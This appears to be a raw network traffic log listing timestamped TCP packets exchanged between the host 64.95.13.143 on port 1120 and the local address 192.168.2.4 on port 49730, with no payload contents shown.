Sep 24, 2024 17:46:10.598181009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598191977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598203897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598253965 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.598253965 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.598432064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598443031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598459005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598465919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598473072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.598483086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.598515034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.599277020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.599287987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.599298954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.599309921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.599337101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.599351883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.600862026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.600872993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.600889921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.600900888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.600910902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.600920916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.600964069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.600984097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.602974892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.626970053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.627052069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.627176046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.627188921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.627233982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.627618074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.627630949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.627682924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.628002882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.628015041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.628026962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.628062963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.629072905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629085064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629095078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629133940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.629163027 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.629565001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629575968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629586935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629596949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.629621029 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.629643917 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.630423069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.630434990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.630445004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.630476952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.631335020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631346941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631356955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631369114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631402969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.631417036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.631906986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631918907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631930113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.631954908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.631968021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.632913113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.632925987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.632936001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.632966042 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.667571068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.667702913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.667720079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.667732000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.667821884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.668126106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668138027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668148041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668205976 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.668924093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668936014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668946028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668960094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.668983936 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.669019938 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.669821024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.669835091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.669845104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.669877052 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.669893980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.670834064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.670845985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.670855045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.670903921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.671333075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.671344995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.671355009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.671365976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.671381950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.671422005 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.672163963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.672174931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.672185898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.672219038 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.672240973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.672883034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.672903061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.672914982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.672944069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.673652887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.673665047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.673674107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.673683882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.673712969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.673755884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.674371004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.674382925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.674396992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.674406052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.674408913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.674422026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.674454927 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.675199032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.675210953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.675216913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.675223112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.675271034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.676019907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676032066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676043034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676053047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676063061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676074982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.676103115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.676876068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676887989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676898956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676908970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676918030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.676923990 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.676965952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.686815023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.686892033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.686903000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.687036037 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.687233925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.687246084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.687254906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.687267065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.687280893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.687310934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.688091993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.688103914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.688113928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.688124895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.688137054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.688158989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.688190937 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.689033031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689043999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689054966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689091921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.689795017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689806938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689816952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689826965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.689848900 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.689881086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.690597057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.690609932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.690619946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.690629959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.690639973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.690650940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.690696955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.691417933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.691436052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.691447020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.691457033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.691509962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.692398071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.692409992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.692420959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.692430973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.692440987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.692501068 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.693326950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.693337917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.693347931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.693383932 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.693413019 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.720069885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720197916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720208883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720242977 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.720638037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720649958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720660925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720673084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.720681906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.720721006 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.721524000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.721534967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.721545935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.721556902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.721563101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.721597910 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.722500086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.722512007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.722522020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.722532034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.722543001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.722603083 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.723463058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.723476887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.723486900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.723499060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.723505974 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.723510981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.723535061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.723561049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.724450111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.724461079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.724472046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.724484921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.724499941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.724529028 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.725380898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.725389004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.725394011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.725430012 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.771116018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771155119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771166086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771243095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.771287918 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.771622896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771635056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771651030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771661997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.771774054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.771775007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.772339106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.772349119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.772358894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.772368908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.772394896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.772412062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.773329020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.773340940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.773350954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.773367882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.773374081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.773412943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.774286985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.774300098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.774310112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.774319887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.774329901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.774338961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.774353981 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.775227070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.775238991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.775249004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.775259972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.775271893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.775300980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.776247978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.776259899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.776269913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.776281118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.776290894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.776300907 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.776315928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.776335955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.777158022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.777168989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.777179003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.777189016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.777209997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.777230978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.778110981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.778121948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.778131962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.778143883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.778153896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.778156042 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.778227091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.779083967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.779095888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.779105902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.779119968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.779129982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.779135942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.779155016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.779176950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.780020952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.780031919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.780042887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.780052900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.780062914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.780092955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.780107021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.781790972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.781838894 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.781954050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.781966925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.782008886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.782272100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.782284021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.782294035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.782305002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.782325983 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.782358885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.783121109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.783133030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.783143044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.783153057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.783166885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.783189058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.783241034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.783972979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.783986092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784020901 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.784142971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.784179926 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.784252882 CEST	1120	49730	64.95.13.143	192.168.2.4
